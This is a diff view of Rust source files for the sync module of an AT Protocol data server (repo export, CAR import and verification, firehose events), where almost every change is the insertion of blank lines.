pub rev: Option<String>,
176
}
177
+
178
pub async fn get_repo_status(
179
State(state): State<AppState>,
180
Query(params): Query<GetRepoStatusParams>,
+4
src/sync/crawl.rs
+4
src/sync/crawl.rs
···
8
use serde::Deserialize;
9
use serde_json::json;
10
use tracing::info;
11
#[derive(Deserialize)]
12
pub struct NotifyOfUpdateParams {
13
pub hostname: String,
14
}
15
pub async fn notify_of_update(
16
State(_state): State<AppState>,
17
Query(params): Query<NotifyOfUpdateParams>,
···
19
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
20
(StatusCode::OK, Json(json!({}))).into_response()
21
}
22
#[derive(Deserialize)]
23
pub struct RequestCrawlInput {
24
pub hostname: String,
25
}
26
pub async fn request_crawl(
27
State(_state): State<AppState>,
28
Json(input): Json<RequestCrawlInput>,
···
8
use serde::Deserialize;
9
use serde_json::json;
10
use tracing::info;
11
+
12
#[derive(Deserialize)]
13
pub struct NotifyOfUpdateParams {
14
pub hostname: String,
15
}
16
+
17
pub async fn notify_of_update(
18
State(_state): State<AppState>,
19
Query(params): Query<NotifyOfUpdateParams>,
···
21
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
22
(StatusCode::OK, Json(json!({}))).into_response()
23
}
24
+
25
#[derive(Deserialize)]
26
pub struct RequestCrawlInput {
27
pub hostname: String,
28
}
29
+
30
pub async fn request_crawl(
31
State(_state): State<AppState>,
32
Json(input): Json<RequestCrawlInput>,
+7
src/sync/deprecated.rs
+7
src/sync/deprecated.rs
···
14
use std::io::Write;
15
use std::str::FromStr;
16
use tracing::error;
17
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
18
#[derive(Deserialize)]
19
pub struct GetHeadParams {
20
pub did: String,
21
}
22
#[derive(Serialize)]
23
pub struct GetHeadOutput {
24
pub root: String,
25
}
26
pub async fn get_head(
27
State(state): State<AppState>,
28
Query(params): Query<GetHeadParams>,
···
63
}
64
}
65
}
66
#[derive(Deserialize)]
67
pub struct GetCheckoutParams {
68
pub did: String,
69
}
70
pub async fn get_checkout(
71
State(state): State<AppState>,
72
Query(params): Query<GetCheckoutParams>,
···
168
)
169
.into_response()
170
}
171
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
172
match value {
173
Ipld::Link(cid) => {
···
14
use std::io::Write;
15
use std::str::FromStr;
16
use tracing::error;
17
+
18
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
20
#[derive(Deserialize)]
21
pub struct GetHeadParams {
22
pub did: String,
23
}
24
+
25
#[derive(Serialize)]
26
pub struct GetHeadOutput {
27
pub root: String,
28
}
29
+
30
pub async fn get_head(
31
State(state): State<AppState>,
32
Query(params): Query<GetHeadParams>,
···
67
}
68
}
69
}
70
+
71
#[derive(Deserialize)]
72
pub struct GetCheckoutParams {
73
pub did: String,
74
}
75
+
76
pub async fn get_checkout(
77
State(state): State<AppState>,
78
Query(params): Query<GetCheckoutParams>,
···
174
)
175
.into_response()
176
}
177
+
178
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
179
match value {
180
Ipld::Link(cid) => {
+1
src/sync/firehose.rs
+1
src/sync/firehose.rs
+13
src/sync/frame.rs
+13
src/sync/frame.rs
···
2
use serde::{Deserialize, Serialize};
3
use std::str::FromStr;
4
use crate::sync::firehose::SequencedEvent;
5
#[derive(Debug, Serialize, Deserialize)]
6
pub struct FrameHeader {
7
pub op: i64,
8
pub t: String,
9
}
10
#[derive(Debug, Serialize, Deserialize)]
11
pub struct CommitFrame {
12
pub seq: i64,
···
25
#[serde(rename = "prevData", skip_serializing_if = "Option::is_none")]
26
pub prev_data: Option<Cid>,
27
}
28
#[derive(Debug, Clone, Serialize, Deserialize)]
29
struct JsonRepoOp {
30
action: String,
···
32
cid: Option<String>,
33
prev: Option<String>,
34
}
35
#[derive(Debug, Serialize, Deserialize)]
36
pub struct RepoOp {
37
pub action: String,
···
40
#[serde(skip_serializing_if = "Option::is_none")]
41
pub prev: Option<Cid>,
42
}
43
#[derive(Debug, Serialize, Deserialize)]
44
pub struct IdentityFrame {
45
pub did: String,
···
48
pub seq: i64,
49
pub time: String,
50
}
51
#[derive(Debug, Serialize, Deserialize)]
52
pub struct AccountFrame {
53
pub did: String,
···
57
pub seq: i64,
58
pub time: String,
59
}
60
#[derive(Debug, Serialize, Deserialize)]
61
pub struct SyncFrame {
62
pub did: String,
···
66
pub seq: i64,
67
pub time: String,
68
}
69
pub struct CommitFrameBuilder {
70
pub seq: i64,
71
pub did: String,
···
75
pub blobs: Vec<String>,
76
pub time: chrono::DateTime<chrono::Utc>,
77
}
78
impl CommitFrameBuilder {
79
pub fn build(self) -> Result<CommitFrame, &'static str> {
80
let commit_cid = Cid::from_str(&self.commit_cid_str)
···
109
})
110
}
111
}
112
fn placeholder_rev() -> String {
113
use jacquard::types::{integer::LimitedU32, string::Tid};
114
Tid::now(LimitedU32::MIN).to_string()
115
}
116
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
117
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
118
}
119
impl TryFrom<SequencedEvent> for CommitFrame {
120
type Error = &'static str;
121
fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> {
122
let builder = CommitFrameBuilder {
123
seq: event.seq,
···
2
use serde::{Deserialize, Serialize};
3
use std::str::FromStr;
4
use crate::sync::firehose::SequencedEvent;
5
+
6
#[derive(Debug, Serialize, Deserialize)]
7
pub struct FrameHeader {
8
pub op: i64,
9
pub t: String,
10
}
11
+
12
#[derive(Debug, Serialize, Deserialize)]
13
pub struct CommitFrame {
14
pub seq: i64,
···
27
#[serde(rename = "prevData", skip_serializing_if = "Option::is_none")]
28
pub prev_data: Option<Cid>,
29
}
30
+
31
#[derive(Debug, Clone, Serialize, Deserialize)]
32
struct JsonRepoOp {
33
action: String,
···
35
cid: Option<String>,
36
prev: Option<String>,
37
}
38
+
39
#[derive(Debug, Serialize, Deserialize)]
40
pub struct RepoOp {
41
pub action: String,
···
44
#[serde(skip_serializing_if = "Option::is_none")]
45
pub prev: Option<Cid>,
46
}
47
+
48
#[derive(Debug, Serialize, Deserialize)]
49
pub struct IdentityFrame {
50
pub did: String,
···
53
pub seq: i64,
54
pub time: String,
55
}
56
+
57
#[derive(Debug, Serialize, Deserialize)]
58
pub struct AccountFrame {
59
pub did: String,
···
63
pub seq: i64,
64
pub time: String,
65
}
66
+
67
#[derive(Debug, Serialize, Deserialize)]
68
pub struct SyncFrame {
69
pub did: String,
···
73
pub seq: i64,
74
pub time: String,
75
}
76
+
77
pub struct CommitFrameBuilder {
78
pub seq: i64,
79
pub did: String,
···
83
pub blobs: Vec<String>,
84
pub time: chrono::DateTime<chrono::Utc>,
85
}
86
+
87
impl CommitFrameBuilder {
88
pub fn build(self) -> Result<CommitFrame, &'static str> {
89
let commit_cid = Cid::from_str(&self.commit_cid_str)
···
118
})
119
}
120
}
121
+
122
fn placeholder_rev() -> String {
123
use jacquard::types::{integer::LimitedU32, string::Tid};
124
Tid::now(LimitedU32::MIN).to_string()
125
}
126
+
127
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
128
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
129
}
130
+
131
impl TryFrom<SequencedEvent> for CommitFrame {
132
type Error = &'static str;
133
+
134
fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> {
135
let builder = CommitFrameBuilder {
136
seq: event.seq,
+15
src/sync/import.rs
+15
src/sync/import.rs
···
9
use thiserror::Error;
10
use tracing::debug;
11
use uuid::Uuid;
12
#[derive(Error, Debug)]
13
pub enum ImportError {
14
#[error("CAR parsing error: {0}")]
···
36
#[error("DID mismatch: CAR is for {car_did}, but authenticated as {auth_did}")]
37
DidMismatch { car_did: String, auth_did: String },
38
}
39
#[derive(Debug, Clone)]
40
pub struct BlobRef {
41
pub cid: String,
42
pub mime_type: Option<String>,
43
}
44
pub async fn parse_car(data: &[u8]) -> Result<(Cid, HashMap<Cid, Bytes>), ImportError> {
45
let cursor = Cursor::new(data);
46
let mut reader = CarReader::new(cursor)
···
61
}
62
Ok((root, blocks))
63
}
64
pub fn find_blob_refs_ipld(value: &Ipld, depth: usize) -> Vec<BlobRef> {
65
if depth > 32 {
66
return vec![];
···
91
_ => vec![],
92
}
93
}
94
pub fn find_blob_refs(value: &JsonValue, depth: usize) -> Vec<BlobRef> {
95
if depth > 32 {
96
return vec![];
···
124
_ => vec![],
125
}
126
}
127
pub fn extract_links(value: &Ipld, links: &mut Vec<Cid>) {
128
match value {
129
Ipld::Link(cid) => {
···
142
_ => {}
143
}
144
}
145
#[derive(Debug)]
146
pub struct ImportedRecord {
147
pub collection: String,
···
149
pub cid: Cid,
150
pub blob_refs: Vec<BlobRef>,
151
}
152
pub fn walk_mst(
153
blocks: &HashMap<Cid, Bytes>,
154
root_cid: &Cid,
···
219
}
220
Ok(records)
221
}
222
pub struct CommitInfo {
223
pub rev: Option<String>,
224
pub prev: Option<String>,
225
}
226
fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> {
227
let obj = match commit {
228
Ipld::Map(m) => m,
···
250
});
251
Ok((data_cid, CommitInfo { rev, prev }))
252
}
253
pub async fn apply_import(
254
db: &PgPool,
255
user_id: Uuid,
···
344
);
345
Ok(records)
346
}
347
#[cfg(test)]
348
mod tests {
349
use super::*;
350
#[test]
351
fn test_find_blob_refs() {
352
let record = serde_json::json!({
···
377
);
378
assert_eq!(blob_refs[0].mime_type, Some("image/jpeg".to_string()));
379
}
380
#[test]
381
fn test_find_blob_refs_no_blobs() {
382
let record = serde_json::json!({
···
386
let blob_refs = find_blob_refs(&record, 0);
387
assert!(blob_refs.is_empty());
388
}
389
#[test]
390
fn test_find_blob_refs_depth_limit() {
391
fn deeply_nested(depth: usize) -> JsonValue {
···
9
use thiserror::Error;
10
use tracing::debug;
11
use uuid::Uuid;
12
+
13
#[derive(Error, Debug)]
14
pub enum ImportError {
15
#[error("CAR parsing error: {0}")]
···
37
#[error("DID mismatch: CAR is for {car_did}, but authenticated as {auth_did}")]
38
DidMismatch { car_did: String, auth_did: String },
39
}
40
+
41
#[derive(Debug, Clone)]
42
pub struct BlobRef {
43
pub cid: String,
44
pub mime_type: Option<String>,
45
}
46
+
47
pub async fn parse_car(data: &[u8]) -> Result<(Cid, HashMap<Cid, Bytes>), ImportError> {
48
let cursor = Cursor::new(data);
49
let mut reader = CarReader::new(cursor)
···
64
}
65
Ok((root, blocks))
66
}
67
+
68
pub fn find_blob_refs_ipld(value: &Ipld, depth: usize) -> Vec<BlobRef> {
69
if depth > 32 {
70
return vec![];
···
95
_ => vec![],
96
}
97
}
98
+
99
pub fn find_blob_refs(value: &JsonValue, depth: usize) -> Vec<BlobRef> {
100
if depth > 32 {
101
return vec![];
···
129
_ => vec![],
130
}
131
}
132
+
133
pub fn extract_links(value: &Ipld, links: &mut Vec<Cid>) {
134
match value {
135
Ipld::Link(cid) => {
···
148
_ => {}
149
}
150
}
151
+
152
#[derive(Debug)]
153
pub struct ImportedRecord {
154
pub collection: String,
···
156
pub cid: Cid,
157
pub blob_refs: Vec<BlobRef>,
158
}
159
+
160
pub fn walk_mst(
161
blocks: &HashMap<Cid, Bytes>,
162
root_cid: &Cid,
···
227
}
228
Ok(records)
229
}
230
+
231
pub struct CommitInfo {
232
pub rev: Option<String>,
233
pub prev: Option<String>,
234
}
235
+
236
fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> {
237
let obj = match commit {
238
Ipld::Map(m) => m,
···
260
});
261
Ok((data_cid, CommitInfo { rev, prev }))
262
}
263
+
264
pub async fn apply_import(
265
db: &PgPool,
266
user_id: Uuid,
···
355
);
356
Ok(records)
357
}
358
+
359
#[cfg(test)]
360
mod tests {
361
use super::*;
362
+
363
#[test]
364
fn test_find_blob_refs() {
365
let record = serde_json::json!({
···
390
);
391
assert_eq!(blob_refs[0].mime_type, Some("image/jpeg".to_string()));
392
}
393
+
394
#[test]
395
fn test_find_blob_refs_no_blobs() {
396
let record = serde_json::json!({
···
400
let blob_refs = find_blob_refs(&record, 0);
401
assert!(blob_refs.is_empty());
402
}
403
+
404
#[test]
405
fn test_find_blob_refs_depth_limit() {
406
fn deeply_nested(depth: usize) -> JsonValue {
+3
src/sync/listener.rs
+3
src/sync/listener.rs
···
3
use sqlx::postgres::PgListener;
4
use std::sync::atomic::{AtomicI64, Ordering};
5
use tracing::{debug, error, info, warn};
6
static LAST_BROADCAST_SEQ: AtomicI64 = AtomicI64::new(0);
7
pub async fn start_sequencer_listener(state: AppState) {
8
let initial_seq = sqlx::query_scalar!("SELECT COALESCE(MAX(seq), 0) as max FROM repo_seq")
9
.fetch_one(&state.db)
···
22
}
23
});
24
}
25
async fn listen_loop(state: AppState) -> anyhow::Result<()> {
26
let mut listener = PgListener::connect_with(&state.db).await?;
27
listener.listen("repo_updates").await?;
···
3
use sqlx::postgres::PgListener;
4
use std::sync::atomic::{AtomicI64, Ordering};
5
use tracing::{debug, error, info, warn};
6
+
7
static LAST_BROADCAST_SEQ: AtomicI64 = AtomicI64::new(0);
8
+
9
pub async fn start_sequencer_listener(state: AppState) {
10
let initial_seq = sqlx::query_scalar!("SELECT COALESCE(MAX(seq), 0) as max FROM repo_seq")
11
.fetch_one(&state.db)
···
24
}
25
});
26
}
27
+
28
async fn listen_loop(state: AppState) -> anyhow::Result<()> {
29
let mut listener = PgListener::connect_with(&state.db).await?;
30
listener.listen("repo_updates").await?;
+1
src/sync/mod.rs
+1
src/sync/mod.rs
+9
src/sync/repo.rs
+9
src/sync/repo.rs
···
14
use std::io::Write;
15
use std::str::FromStr;
16
use tracing::error;
17
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
18
#[derive(Deserialize)]
19
pub struct GetBlocksQuery {
20
pub did: String,
21
pub cids: String,
22
}
23
pub async fn get_blocks(
24
State(state): State<AppState>,
25
Query(query): Query<GetBlocksQuery>,
···
81
)
82
.into_response()
83
}
84
#[derive(Deserialize)]
85
pub struct GetRepoQuery {
86
pub did: String,
87
pub since: Option<String>,
88
}
89
pub async fn get_repo(
90
State(state): State<AppState>,
91
Query(query): Query<GetRepoQuery>,
···
177
)
178
.into_response()
179
}
180
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
181
match value {
182
Ipld::Link(cid) => {
···
195
_ => {}
196
}
197
}
198
#[derive(Deserialize)]
199
pub struct GetRecordQuery {
200
pub did: String,
201
pub collection: String,
202
pub rkey: String,
203
}
204
pub async fn get_record(
205
State(state): State<AppState>,
206
Query(query): Query<GetRecordQuery>,
···
209
use jacquard_repo::mst::Mst;
210
use std::collections::BTreeMap;
211
use std::sync::Arc;
212
let repo_row = sqlx::query!(
213
r#"
214
SELECT r.repo_root_cid
···
14
use std::io::Write;
15
use std::str::FromStr;
16
use tracing::error;
17
+
18
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
20
#[derive(Deserialize)]
21
pub struct GetBlocksQuery {
22
pub did: String,
23
pub cids: String,
24
}
25
+
26
pub async fn get_blocks(
27
State(state): State<AppState>,
28
Query(query): Query<GetBlocksQuery>,
···
84
)
85
.into_response()
86
}
87
+
88
#[derive(Deserialize)]
89
pub struct GetRepoQuery {
90
pub did: String,
91
pub since: Option<String>,
92
}
93
+
94
pub async fn get_repo(
95
State(state): State<AppState>,
96
Query(query): Query<GetRepoQuery>,
···
182
)
183
.into_response()
184
}
185
+
186
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
187
match value {
188
Ipld::Link(cid) => {
···
201
_ => {}
202
}
203
}
204
+
205
#[derive(Deserialize)]
206
pub struct GetRecordQuery {
207
pub did: String,
208
pub collection: String,
209
pub rkey: String,
210
}
211
+
212
pub async fn get_record(
213
State(state): State<AppState>,
214
Query(query): Query<GetRecordQuery>,
···
217
use jacquard_repo::mst::Mst;
218
use std::collections::BTreeMap;
219
use std::sync::Arc;
220
+
221
let repo_row = sqlx::query!(
222
r#"
223
SELECT r.repo_root_cid
+8
src/sync/subscribe_repos.rs
+8
src/sync/subscribe_repos.rs
···
10
use std::sync::atomic::{AtomicUsize, Ordering};
11
use tokio::sync::broadcast::error::RecvError;
12
use tracing::{error, info, warn};
13
const BACKFILL_BATCH_SIZE: i64 = 1000;
14
static SUBSCRIBER_COUNT: AtomicUsize = AtomicUsize::new(0);
15
#[derive(Deserialize)]
16
pub struct SubscribeReposParams {
17
pub cursor: Option<i64>,
18
}
19
#[axum::debug_handler]
20
pub async fn subscribe_repos(
21
ws: WebSocketUpgrade,
···
24
) -> Response {
25
ws.on_upgrade(move |socket| handle_socket(socket, state, params))
26
}
27
async fn send_event(
28
socket: &mut WebSocket,
29
state: &AppState,
···
33
socket.send(Message::Binary(bytes.into())).await?;
34
Ok(())
35
}
36
pub fn get_subscriber_count() -> usize {
37
SUBSCRIBER_COUNT.load(Ordering::SeqCst)
38
}
39
async fn handle_socket(mut socket: WebSocket, state: AppState, params: SubscribeReposParams) {
40
let count = SUBSCRIBER_COUNT.fetch_add(1, Ordering::SeqCst) + 1;
41
crate::metrics::set_firehose_subscribers(count);
···
45
crate::metrics::set_firehose_subscribers(count);
46
info!(subscribers = count, "Firehose subscriber disconnected");
47
}
48
async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> {
49
if let Some(cursor) = params.cursor {
50
let mut current_cursor = cursor;
···
10
use std::sync::atomic::{AtomicUsize, Ordering};
11
use tokio::sync::broadcast::error::RecvError;
12
use tracing::{error, info, warn};
13
+
14
const BACKFILL_BATCH_SIZE: i64 = 1000;
15
+
16
static SUBSCRIBER_COUNT: AtomicUsize = AtomicUsize::new(0);
17
+
18
#[derive(Deserialize)]
19
pub struct SubscribeReposParams {
20
pub cursor: Option<i64>,
21
}
22
+
23
#[axum::debug_handler]
24
pub async fn subscribe_repos(
25
ws: WebSocketUpgrade,
···
28
) -> Response {
29
ws.on_upgrade(move |socket| handle_socket(socket, state, params))
30
}
31
+
32
async fn send_event(
33
socket: &mut WebSocket,
34
state: &AppState,
···
38
socket.send(Message::Binary(bytes.into())).await?;
39
Ok(())
40
}
41
+
42
pub fn get_subscriber_count() -> usize {
43
SUBSCRIBER_COUNT.load(Ordering::SeqCst)
44
}
45
+
46
async fn handle_socket(mut socket: WebSocket, state: AppState, params: SubscribeReposParams) {
47
let count = SUBSCRIBER_COUNT.fetch_add(1, Ordering::SeqCst) + 1;
48
crate::metrics::set_firehose_subscribers(count);
···
52
crate::metrics::set_firehose_subscribers(count);
53
info!(subscribers = count, "Firehose subscriber disconnected");
54
}
55
+
56
async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> {
57
if let Some(cursor) = params.cursor {
58
let mut current_cursor = cursor;
+10
src/sync/util.rs
+10
src/sync/util.rs
···
10
use std::io::Cursor;
11
use std::str::FromStr;
12
use tokio::io::AsyncWriteExt;
13
fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> {
14
Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string())
15
}
16
async fn write_car_blocks(
17
commit_cid: Cid,
18
commit_bytes: Option<Bytes>,
···
37
.map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?;
38
Ok(buffer.into_inner())
39
}
40
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
41
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
42
}
43
fn format_identity_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
44
let frame = IdentityFrame {
45
did: event.did.clone(),
···
56
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
57
Ok(bytes)
58
}
59
fn format_account_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
60
let frame = AccountFrame {
61
did: event.did.clone(),
···
73
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
74
Ok(bytes)
75
}
76
async fn format_sync_event(
77
state: &AppState,
78
event: &SequencedEvent,
···
101
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
102
Ok(bytes)
103
}
104
pub async fn format_event_for_sending(
105
state: &AppState,
106
event: SequencedEvent,
···
168
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
169
Ok(bytes)
170
}
171
pub async fn prefetch_blocks_for_events(
172
state: &AppState,
173
events: &[SequencedEvent],
···
206
}
207
Ok(blocks_map)
208
}
209
fn format_sync_event_with_prefetched(
210
event: &SequencedEvent,
211
prefetched: &HashMap<Cid, Bytes>,
···
236
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
237
Ok(bytes)
238
}
239
pub async fn format_event_with_prefetched_blocks(
240
event: SequencedEvent,
241
prefetched: &HashMap<Cid, Bytes>,
···
10
use std::io::Cursor;
11
use std::str::FromStr;
12
use tokio::io::AsyncWriteExt;
13
+
14
fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> {
15
Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string())
16
}
17
+
18
async fn write_car_blocks(
19
commit_cid: Cid,
20
commit_bytes: Option<Bytes>,
···
39
.map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?;
40
Ok(buffer.into_inner())
41
}
42
+
43
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
44
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
45
}
46
+
47
fn format_identity_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
48
let frame = IdentityFrame {
49
did: event.did.clone(),
···
60
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
61
Ok(bytes)
62
}
63
+
64
fn format_account_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
65
let frame = AccountFrame {
66
did: event.did.clone(),
···
78
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
79
Ok(bytes)
80
}
81
+
82
async fn format_sync_event(
83
state: &AppState,
84
event: &SequencedEvent,
···
107
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
108
Ok(bytes)
109
}
110
+
111
pub async fn format_event_for_sending(
112
state: &AppState,
113
event: SequencedEvent,
···
175
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
176
Ok(bytes)
177
}
178
+
179
pub async fn prefetch_blocks_for_events(
180
state: &AppState,
181
events: &[SequencedEvent],
···
214
}
215
Ok(blocks_map)
216
}
217
+
218
fn format_sync_event_with_prefetched(
219
event: &SequencedEvent,
220
prefetched: &HashMap<Cid, Bytes>,
···
245
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
246
Ok(bytes)
247
}
248
+
249
pub async fn format_event_with_prefetched_blocks(
250
event: SequencedEvent,
251
prefetched: &HashMap<Cid, Bytes>,
+13
src/sync/verify.rs
+13
src/sync/verify.rs
···
8
use std::collections::HashMap;
9
use thiserror::Error;
10
use tracing::{debug, warn};
11
#[derive(Error, Debug)]
12
pub enum VerifyError {
13
#[error("Invalid commit: {0}")]
···
30
#[error("Invalid CBOR: {0}")]
31
InvalidCbor(String),
32
}
33
pub struct CarVerifier {
34
http_client: Client,
35
}
36
impl Default for CarVerifier {
37
fn default() -> Self {
38
Self::new()
39
}
40
}
41
impl CarVerifier {
42
pub fn new() -> Self {
43
Self {
···
47
.unwrap_or_default(),
48
}
49
}
50
pub async fn verify_car(
51
&self,
52
expected_did: &str,
···
80
prev: commit.prev().cloned(),
81
})
82
}
83
async fn resolve_did_signing_key(&self, did: &str) -> Result<PublicKey<'static>, VerifyError> {
84
let did_doc = self.resolve_did_document(did).await?;
85
did_doc
···
87
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?
88
.ok_or(VerifyError::NoSigningKey)
89
}
90
async fn resolve_did_document(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
91
if did.starts_with("did:plc:") {
92
self.resolve_plc_did(did).await
···
99
)))
100
}
101
}
102
async fn resolve_plc_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
103
let plc_url = std::env::var("PLC_DIRECTORY_URL")
104
.unwrap_or_else(|_| "https://plc.directory".to_string());
···
123
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
124
Ok(doc.into_static())
125
}
126
async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
127
let domain = did
128
.strip_prefix("did:web:")
···
154
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
155
Ok(doc.into_static())
156
}
157
fn verify_mst_structure(
158
&self,
159
data_cid: &Cid,
160
blocks: &HashMap<Cid, Bytes>,
161
) -> Result<(), VerifyError> {
162
use ipld_core::ipld::Ipld;
163
let mut stack = vec![*data_cid];
164
let mut visited = std::collections::HashSet::new();
165
let mut node_count = 0;
···
246
Ok(())
247
}
248
}
249
#[derive(Debug, Clone)]
250
pub struct VerifiedCar {
251
pub did: String,
···
253
pub data_cid: Cid,
254
pub prev: Option<Cid>,
255
}
256
#[cfg(test)]
257
#[path = "verify_tests.rs"]
258
mod tests;
···
8
use std::collections::HashMap;
9
use thiserror::Error;
10
use tracing::{debug, warn};
11
+
12
#[derive(Error, Debug)]
13
pub enum VerifyError {
14
#[error("Invalid commit: {0}")]
···
31
#[error("Invalid CBOR: {0}")]
32
InvalidCbor(String),
33
}
34
+
35
pub struct CarVerifier {
36
http_client: Client,
37
}
38
+
39
impl Default for CarVerifier {
40
fn default() -> Self {
41
Self::new()
42
}
43
}
44
+
45
impl CarVerifier {
46
pub fn new() -> Self {
47
Self {
···
51
.unwrap_or_default(),
52
}
53
}
54
+
55
pub async fn verify_car(
56
&self,
57
expected_did: &str,
···
85
prev: commit.prev().cloned(),
86
})
87
}
88
+
89
async fn resolve_did_signing_key(&self, did: &str) -> Result<PublicKey<'static>, VerifyError> {
90
let did_doc = self.resolve_did_document(did).await?;
91
did_doc
···
93
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?
94
.ok_or(VerifyError::NoSigningKey)
95
}
96
+
97
async fn resolve_did_document(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
98
if did.starts_with("did:plc:") {
99
self.resolve_plc_did(did).await
···
106
)))
107
}
108
}
109
+
110
async fn resolve_plc_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
111
let plc_url = std::env::var("PLC_DIRECTORY_URL")
112
.unwrap_or_else(|_| "https://plc.directory".to_string());
···
131
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
132
Ok(doc.into_static())
133
}
134
+
135
async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
136
let domain = did
137
.strip_prefix("did:web:")
···
163
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
164
Ok(doc.into_static())
165
}
166
+
167
fn verify_mst_structure(
168
&self,
169
data_cid: &Cid,
170
blocks: &HashMap<Cid, Bytes>,
171
) -> Result<(), VerifyError> {
172
use ipld_core::ipld::Ipld;
173
+
174
let mut stack = vec![*data_cid];
175
let mut visited = std::collections::HashSet::new();
176
let mut node_count = 0;
···
257
Ok(())
258
}
259
}
260
+
261
#[derive(Debug, Clone)]
262
pub struct VerifiedCar {
263
pub did: String,
···
265
pub data_cid: Cid,
266
pub prev: Option<Cid>,
267
}
268
+
269
#[cfg(test)]
270
#[path = "verify_tests.rs"]
271
mod tests;
+22
src/sync/verify_tests.rs
+22
src/sync/verify_tests.rs
···
5
use cid::Cid;
6
use sha2::{Digest, Sha256};
7
use std::collections::HashMap;
8
fn make_cid(data: &[u8]) -> Cid {
9
let mut hasher = Sha256::new();
10
hasher.update(data);
···
12
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
13
Cid::new_v1(0x71, multihash)
14
}
15
#[test]
16
fn test_verifier_creation() {
17
let _verifier = CarVerifier::new();
18
}
19
#[test]
20
fn test_verify_error_display() {
21
let err = VerifyError::DidMismatch {
···
31
let err = VerifyError::MstValidationFailed("test error".to_string());
32
assert!(err.to_string().contains("test error"));
33
}
34
#[test]
35
fn test_mst_validation_missing_root_block() {
36
let verifier = CarVerifier::new();
···
41
let err = result.unwrap_err();
42
assert!(matches!(err, VerifyError::BlockNotFound(_)));
43
}
44
#[test]
45
fn test_mst_validation_invalid_cbor() {
46
let verifier = CarVerifier::new();
···
53
let err = result.unwrap_err();
54
assert!(matches!(err, VerifyError::InvalidCbor(_)));
55
}
56
#[test]
57
fn test_mst_validation_empty_node() {
58
let verifier = CarVerifier::new();
···
65
let result = verifier.verify_mst_structure(&cid, &blocks);
66
assert!(result.is_ok());
67
}
68
#[test]
69
fn test_mst_validation_missing_left_pointer() {
70
use ipld_core::ipld::Ipld;
71
let verifier = CarVerifier::new();
72
let missing_left_cid = make_cid(b"missing left");
73
let node = Ipld::Map(std::collections::BTreeMap::from([
···
84
assert!(matches!(err, VerifyError::BlockNotFound(_)));
85
assert!(err.to_string().contains("left pointer"));
86
}
87
#[test]
88
fn test_mst_validation_missing_subtree() {
89
use ipld_core::ipld::Ipld;
90
let verifier = CarVerifier::new();
91
let missing_subtree_cid = make_cid(b"missing subtree");
92
let record_cid = make_cid(b"record");
···
109
assert!(matches!(err, VerifyError::BlockNotFound(_)));
110
assert!(err.to_string().contains("subtree"));
111
}
112
#[test]
113
fn test_mst_validation_unsorted_keys() {
114
use ipld_core::ipld::Ipld;
115
let verifier = CarVerifier::new();
116
let record_cid = make_cid(b"record");
117
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
137
assert!(matches!(err, VerifyError::MstValidationFailed(_)));
138
assert!(err.to_string().contains("sorted"));
139
}
140
#[test]
141
